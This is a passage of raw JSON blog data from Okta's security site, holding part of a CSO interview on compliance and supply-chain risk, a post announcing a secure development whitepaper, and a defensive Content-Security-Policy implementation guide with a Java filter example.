outcomes. To make Okta and our customers the most secure companies in the world, we’re placing big bets to deliver on our \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://www.okta.com/secure-identity-commitment/\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"OSIC\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" initiatives and elevate Okta as the industry leader in Identity and cybersecurity.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-5\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"In your opinion, does achieving compliance equate to a strong security posture?\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Yes, and no! Let me explain… For SaaS companies like Okta, our maturity measurement is gauged both internally through various compliance frameworks like SOC2, ISO27001, NIST CSF, etc. and also by our customers.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"But what you read and what you see can have disparities. For example, suppose your company completes a SOC2 attestation with a clean opinion and no control exceptions. In that case, it's a sign of success based on those controls your organization has defined and implemented. Or is it just a piece of paper that shows an independent audit firm assessed your controls based on prescriptive guidance but with no substantive value to the organizations receiving the report? Therein lies a core problem, your controls were assessed with a subjective assessor.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Regulators are starting to pick up on the quality of attestations and are putting more emphasis on third-party risk functions to objectively observe control execution with their own eyes. Attestations are still needed and are a great tool to measure your internal control effectiveness. But perception is a two-way street and if we want to elevate the measurement of success in the cybersecurity industry, we need to cast a broader net to our audiences to truly understand what a strong security posture should look like.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-5\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"From your perspective, what is the most fulfilling part of your role as Regional CSO?\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"As a self-proclaimed ‘Agent of Change,’ the most fulfilling part of my role is participating in security and compliance discussions and helping our customers tackle the challenges head-on. While every customer engagement has a different look and feel, at Okta, we’re all working towards a common goal to elevate the Identity industry and make Okta and our customers the world’s most secure companies.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-5\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"How do you describe your Regional CSO role to non-technical friends and family?\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"In the words of my amazing wife, “Matthew helps protect our daughters' data and privacy.” \",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-5\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"What key challenges do you predict the cybersecurity industry will face this coming year?\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"While Artificial Intelligence is buzzing in everyone's mind and will become a game changer for organizations, I believe the risk concentration in the cybersecurity supply chain will be the next layer of scrutiny organizations accelerate with. With the adoption of large enterprises investing more in Cloud-based solutions over the last 5-10 years, we’ve seen the evolution of attacks become more persistent and successful. While this reliance on Cloud-based tools can enhance operations, many of those tools depend on open-source components, opening the door to compromise thousands of users at once.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Concentrate that risk with large vendors, handling thousands of customers, and the attack vector can disrupt entire industries. For example, you buy a smartphone, and the supplier that manufactures the processor has identified a security flaw. The phone manufacturer can check its Software Bill of Materials (SBOM) to see which models use that processor and issue a fix or recall the device. \",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Organizations need to work with their critical vendors and assess the supply chain. SBOMs are important tools in your risk management program that help improve transparency, so organizations know exactly what they’re using and can address security issues before they become problems.\",\"marks\":[],\"data\":{}}]}]}"},"summary":{"summary":"CSO Conversations is a blog series interviewing Okta’s Regional CSOs supporting David Bradbury, Okta’s Chief Security Officer in providing the best service for our customers. Okta’s Regional CSOs are integral to Okta’s Security Trust and Culture team, building and strengthening trusted advisor relationships with global security thought leadership."},"updatedAt":"2025-03-19T17:23:31.201Z","secAuthor":[{"id":"06b9e469-2cb0-5dc7-a6c5-e46c9a367857","bio":{"bio":"Matthew Hansen is a Regional CSO for Okta’s Americas West region. As a leader in security risk management, his accolades include MBA, CISA, and CCSK. Backed by over 15 years of experience in consulting, internal audit, IT governance and risk management, Matthew provides security program support to Okta’s customers. During his downtime, he enjoys travelling the world, experiencing new cultures, and attending Formula 1 races.
"},"image":{"url":"https://images.ctfassets.net/kbkgmx9upatd/2vOslCjVk2xgZ4BuG12HVw/aa9c0b6973bb44bbd633811d7476dbea/1740433904939.jpeg"},"name":"Matthew Hansen","jobTitle":"Regional CSO, Americas West","slug":"/hackers/matthew-hansen","node_locale":"en"}]},{"slug":"/articles/2025/03/putting-security-first-with-secure-development","id":"63b37b1e-94b4-5967-83b1-446c696b5423","title":"Putting Security First with Secure Development","date":"2025-03-05T00:00","sys":{"contentType":{"sys":{"id":"secBlogpost","linkType":"ContentType","type":"Link"}},"type":"Entry"},"body":{"raw":"{\"data\":{},\"content\":[{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"At Okta, prioritizing security at the earliest stages of technology development and throughout the Software Development Lifecycle (SDLC) is of utmost importance. This blog article introduces our new \",\"nodeType\":\"text\"},{\"data\":{\"uri\":\"https://www.okta.com/resources/whitepaper-secure-development-lifecycle/\"},\"content\":[{\"data\":{},\"marks\":[{\"type\":\"underline\"}],\"value\":\"Secure Development Lifecycle (SDL) whitepaper\",\"nodeType\":\"text\"}],\"nodeType\":\"hyperlink\"},{\"data\":{},\"marks\":[],\"value\":\" and highlights the importance of secure development practices throughout the technology lifecycle. As our \",\"nodeType\":\"text\"},{\"data\":{\"uri\":\"https://www.okta.com/blog/2024/04/the-story-behind-oktas-values/\"},\"content\":[{\"data\":{},\"marks\":[{\"type\":\"underline\"}],\"value\":\"core values\",\"nodeType\":\"text\"}],\"nodeType\":\"hyperlink\"},{\"data\":{},\"marks\":[],\"value\":\" indicate, we’re committed to the highest standards of security with the goal of being \",\"nodeType\":\"text\"},{\"data\":{},\"marks\":[{\"type\":\"italic\"}],\"value\":\"Always Secure. Always On.\",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"},{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"Security from the start\",\"nodeType\":\"text\"}],\"nodeType\":\"heading-3\"},{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"Developing and enhancing our products and services with security at the outset helps produce outcomes more resistant to emerging cyber threats. We strategize from the outset to develop and release products that are \",\"nodeType\":\"text\"},{\"data\":{\"uri\":\"https://sec.okta.com/articles/cisasecurebydesign1/\"},\"content\":[{\"data\":{},\"marks\":[{\"type\":\"underline\"}],\"value\":\"secure by design\",\"nodeType\":\"text\"}],\"nodeType\":\"hyperlink\"},{\"data\":{},\"marks\":[],\"value\":\". By incorporating a security-centric approach to development, technology risks are reduced and limited in impact. We incorporate security from the start through secure coding practices, routine security testing, threat modeling, and other methodologies to proactively address potential security gaps.\",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"},{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"Today’s tech landscape comes with stringent regulations and compliance requirements, so it’s important for organizations to leverage technologies that employ secure development practices. Customer trust is not only an objective we strive for, and it’s at the very core of our customer relationships. We are dedicated to safeguarding customer interests and maintaining the highest standards of security, quality and integrity. By leveraging securely developed technology, organizations gain added assurance against various Identity threats.\",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"},{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"Introducing a new whitepaper\",\"nodeType\":\"text\"}],\"nodeType\":\"heading-3\"},{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"We’re committed to taking action against Identity attacks, as outlined in our long-term initiative, the \",\"nodeType\":\"text\"},{\"data\":{\"uri\":\"https://www.okta.com/secure-identity-commitment/\"},\"content\":[{\"data\":{},\"marks\":[{\"type\":\"underline\"}],\"value\":\"Okta Secure Identity Commitment\",\"nodeType\":\"text\"}],\"nodeType\":\"hyperlink\"},{\"data\":{},\"marks\":[],\"value\":\". This commitment includes hardening our corporate infrastructure and product suite by accelerating our investment to further protect against Identity-based threats.\",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"},{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"Our new resource, the \",\"nodeType\":\"text\"},{\"data\":{\"uri\":\"https://www.okta.com/resources/whitepaper-secure-development-lifecycle/\"},\"content\":[{\"data\":{},\"marks\":[{\"type\":\"underline\"}],\"value\":\"Secure Development Lifecycle (SDL) whitepaper\",\"nodeType\":\"text\"}],\"nodeType\":\"hyperlink\"},{\"data\":{},\"marks\":[],\"value\":\", encompasses Okta’s security practices, methodologies, and requirements. In this whitepaper, we provide insight into our multi-layered secure practices that are incorporated in both the Product Development Lifecycle (PDLC) and Software Development Lifecycle (SDLC).\",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"},{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"The Secure Development Lifecycle (SDL) whitepaper provides an overview of security-centric considerations, including our comprehensive security practices. Okta’s teams leverage industry best practices within each stage of development, as detailed in the whitepaper.\",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"},{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"Continuous improvement\",\"nodeType\":\"text\"}],\"nodeType\":\"heading-3\"},{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"Last year, Okta was recognized by Gartner as a \",\"nodeType\":\"text\"},{\"data\":{\"uri\":\"https://www.okta.com/resources/gartner-magic-quadrant-access-management/?utm_source=google&utm_campaign=amer_mult_can_all_wf-it_dg-ao_a-wf_search_google_text_kw_it-brand-exact_utm2&utm_medium=cpc&utm_id=aNK4z0000004Dm5GAE&utm_term=why%20okta&utm_page=%7Burl%7D&gad_source=1&gclid=Cj0KCQiAwtu9BhC8ARIsAI9JHak5gaHprkNb3OAGpDDyiLBjxoyAeLXeZ6BR4HFjQJ7OP1eETW7YmVsaAgqXEALw_wcB\"},\"content\":[{\"data\":{},\"marks\":[{\"type\":\"underline\"}],\"value\":\"Leader in the December 2024 “Magic Quadrant for Access Management.”\",\"nodeType\":\"text\"}],\"nodeType\":\"hyperlink\"},{\"data\":{},\"marks\":[],\"value\":\" This marks the \",\"nodeType\":\"text\"},{\"data\":{},\"marks\":[{\"type\":\"bold\"}],\"value\":\"eighth year in a row\",\"nodeType\":\"text\"},{\"data\":{},\"marks\":[],\"value\":\" that Okta has been recognized in this capacity. Okta was also recognized in \",\"nodeType\":\"text\"},{\"data\":{\"uri\":\"https://www.okta.com/resources/analyst-research-okta-recognized-as-a-2024-gartner-peer-insights/\"},\"content\":[{\"data\":{},\"marks\":[{\"type\":\"underline\"}],\"value\":\"April 2024 as a Gartner Peer Insights Customers’ Choice for Access Management\",\"nodeType\":\"text\"}],\"nodeType\":\"hyperlink\"},{\"data\":{},\"marks\":[],\"value\":\". To maintain this status, we’re always looking to improve our secure practices and, in turn, our products and services. Our practices are subject to routine review in order to further improve our high security standards.\\n\",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"},{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"We continue to prioritize customer trust by spotlighting customer needs in our product innovation. Our vision of building a world where anyone can safely use any technology powered by their Identity\",\"nodeType\":\"text\"},{\"data\":{},\"marks\":[{\"type\":\"italic\"}],\"value\":\" \",\"nodeType\":\"text\"},{\"data\":{},\"marks\":[],\"value\":\"continues to guide us. To learn more about Okta’s Bug Bounty program and how you can contribute to a safer technology landscape, visit \",\"nodeType\":\"text\"},{\"data\":{\"uri\":\"https://bugcrowd.com/engagements/okta\"},\"content\":[{\"data\":{},\"marks\":[{\"type\":\"underline\"}],\"value\":\"Okta platform BugCrowd\",\"nodeType\":\"text\"}],\"nodeType\":\"hyperlink\"},{\"data\":{},\"marks\":[],\"value\":\" and \",\"nodeType\":\"text\"},{\"data\":{\"uri\":\"https://bugcrowd.com/engagements/auth0-okta\"},\"content\":[{\"data\":{},\"marks\":[{\"type\":\"underline\"}],\"value\":\"Auth0 platform BugCrowd\",\"nodeType\":\"text\"}],\"nodeType\":\"hyperlink\"},{\"data\":{},\"marks\":[],\"value\":\".\",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"}],\"nodeType\":\"document\"}"},"summary":{"summary":"At Okta, prioritizing security at the earliest stages of technology development and throughout the Software Development Lifecycle (SDLC) is of utmost importance. This blog article introduces our new Secure Development Lifecycle (SDL) whitepaper and highlights the importance of secure development practices throughout the technology lifecycle."},"updatedAt":"2025-03-05T17:47:28.426Z","secAuthor":[{"id":"2f88c41e-3abf-5fcc-9a06-9ed78081f8e2","bio":{"bio":"Carmen Girardin is a Manager, Security Communications at Okta. Backed by over a decade of experience in the fintech sector, Carmen is a proficient technical writer with domain expertise in Identity and Access Management (IAM). She is passionate about delivering engaging, timely customer communications on the cybersecurity ecosystem and the evolving threat landscape, to help our customers gain the most value from Okta. Carmen spends her downtime traveling, thrifting for treasures and reading.
"},"image":{"url":"https://images.ctfassets.net/kbkgmx9upatd/gBvc42utKRh6jJpgLjxrt/fb5e38cd4c6043a5e888850b4b2c2df4/IMG_8061.jpg"},"name":"Carmen Girardin","jobTitle":"Manager, Security Communications","slug":"/hackers/carmen-girardin","node_locale":"en"}]},{"slug":"/articles/2025/02/content-security-policy-in-a-complex-environment","id":"3f71c30f-a63f-5c25-b46d-987b7b24165c","title":"Content-Security-Policy in a Complex Environment","date":"2025-02-19T00:00","sys":{"contentType":{"sys":{"id":"secBlogpost","linkType":"ContentType","type":"Link"}},"type":"Entry"},"body":{"raw":"{\"nodeType\":\"document\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://help.okta.com/oie/en-us/content/topics/settings/customizations-configure-csp.htm\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Content-Security-Policy\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" (CSP) is a web security mechanism that helps protect against various types of cybersecurity attacks by defining and enforcing a set of policies regarding the content that a website can load and subsequently execute.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Essentially, it’s an allow-list policy that dictates what a web page can load. CSP is complex to implement and rollout - even a minor mistake could mean that important parts of the page will not load, which in Okta’s case could mean trouble authenticating. This blog article aims to provide a glimpse into our secure implementation journey and guidance for the industry based on lessons learned.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-3\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta values web security\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta employs various defenses against Cross-Site Scripting (XSS) attacks such as input validation and output encoding to increase security assurance against emerging threats. With \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://cwe.mitre.org/top25/archive/2024/2024_cwe_top25.html\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"MITRE and CISA’s confirmation of XSS as 2024’s top threat\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\", it’s highly probable that an application is vulnerable to XSS at some point in time. Content-Security-Policy is effectively a gate-keeper that dictates to the browser which sources of scripts and content are secure, trusted, and can be executed. Okta’s environment is complex, and as such, our CSP header is constantly being improved upon.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-3\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Implementation challenges\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"A key pillar of the \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://www.okta.com/secure-identity-commitment/\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta Secure Identity Commitment\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" (OSIC) includes raising the bar for the industry - here, we’re sharing our industry learnings, tips, tricks, and more. Upon configuration of CSP policies at Okta, the Engineering Security team encountered the following challenges throughout the implementation. \",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-4\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Complexity\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"The nature of \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://www.okta.com/workforce-identity/\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta Workforce Identity\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" is that it operates in an environment with multiple application connections, varying feature combinations, and html pages that are customizable by \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://help.okta.com/en-us/content/topics/security/administrators-admin-comparison.htm\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta administrators\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\". It becomes evident quickly that building and rolling out even a basic Content-Security-Policy can be challenging.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-3\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Configuration challenges\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"The most prominent determination in CSP configuration is whether or not the application in question returns endpoints that contain customizable content by Okta administrators. The following three detailed approaches include our recommendations in configuring CSP:\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-4\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"1. The interceptor approach\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"A common approach is to use an \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://docs.spring.io/spring-framework/docs/current/javadoc-api/org/springframework/web/servlet/HandlerInterceptor.html\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"interceptor\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" to add the CSP headers. At the time, this best fit our model at Okta, so this is where we started. But there are some challenges here, such as:\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"unordered-list\",\"data\":{},\"content\":[{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"An addition of correct policy for endpoints that return \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://help.okta.com/oie/en-us/content/topics/settings/customizations-configure-csp.htm\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"user customized html content\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\",\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Caution with the interceptor order: the CSP headers need to be added as close to the beginning of the order of interceptors, in case some interceptors break the interceptor chain early.\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"The preHandle() and postHandle() are not always known if the content-type is html, but can be indicated by using annotations at the endpoint level to determine the response type,\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Commitment of response via \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://developer.mozilla.org/en-US/docs/Web/API/XMLHttpRequest\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"XHR\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" in the preHandle(), which cannot be modified as the postHandle() is executed,\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Database calls in an interceptor may be cached, and the time response has been committed afterCompletion().\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"heading-4\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"2. The filter approach\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"An alternate approach to adding a CSP header when the application returns html content is to apply the header when the content type of the endpoint is known. The following example displays a method of CSP generation as a filter in a spring web application, based on the content-type header that is returned to only apply the CSP for html:\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\" protected void doFilterInternal(HttpServletRequest request,\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\" HttpServletResponse response,\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\" FilterChain filterChain) throws ServletException, IOException {\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\" HttpServletResponseWrapper wrapper = new HttpServletResponseWrapper(response) {\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\" @Override\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\" public void addHeader(String name, String value) {\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\" super.addHeader(name, value);\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\" if (HttpHeaders.CONTENT_TYPE.equalsIgnoreCase(name)) {\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\" setCSPHeaders(value);\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\" }\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\" }\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\" @Override\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\" public void setHeader(String name, String value) {\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\" super.setHeader(name, value);\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\" if (HttpHeaders.CONTENT_TYPE.equalsIgnoreCase(name)) {\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\" setCSPHeaders(value);\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\" }\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\" }\\n\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\" @Override\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\" public void setContentType(String type) {\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\" super.setContentType(type);\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\" setCSPHeaders(type);\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\" }\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\" private void setCSPHeaders(String contentType) {\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\" if (StringUtils.isNotEmpty(contentType) && StringUtils.containsIgnoreCase(type, MimeTypeUtils.TEXT_HTML_VALUE) {\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\" LOG.debug(\\\"Content-Type header={}\\\", contentType)\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\" // the code to build the Content-Security-Policy-Report-Only and Content-Security-Policy headers\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\" }\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\" }\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\" };\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\" filterChain.doFilter(request, wrapper);\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\" }\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-4\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"3. The edge approach\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Scott Helme details this approach in his \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://scotthelme.co.uk/csp-nonces-the-easy-way-with-cloudflare-workers/\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"blog post\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\", where he leverages the edge to intercept HTTP traffic and inject the CSP policy. In his particular example, he uses the Cloudflare Service workers, as an “easy” way to implement the generic CSP policy. One advantage of this method is that it can be applied to multiple applications, which gives you a single maintenance point for maintaining the CSP policy. Though generic, this approach can be added to any application without changing its code.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-3\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Configuration considerations\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-4\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Violation reports\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta’s application range is quite large and has many endpoints, which resulted in too many violation reports. The reporting URI to which CSP tells the browser to forward the violation reports will quickly produce a large amount of data. And, it’s mostly the same violations repeated multiple times per page load. The reporting vendor may have a way to ignore certain violations that are expected since they should not be in the policy. Reporting vendors aren’t incentivized to ignore features, since they receive the reports and have to process them. Okta’s method in tackling this problem was to implement a sampling of violation reports on the server side where the CSP headers are added. We provided knobs to control the requests that will receive the CSP headers, ultimately reducing the traffic sent to our reporting endpoint. An alternative to this method could be to build an in-house solution to receive the reporting data and dismiss repeated violations at the receiving end. \",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-5\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Sample violation: Where Content-Security-Policy (CSP) did not 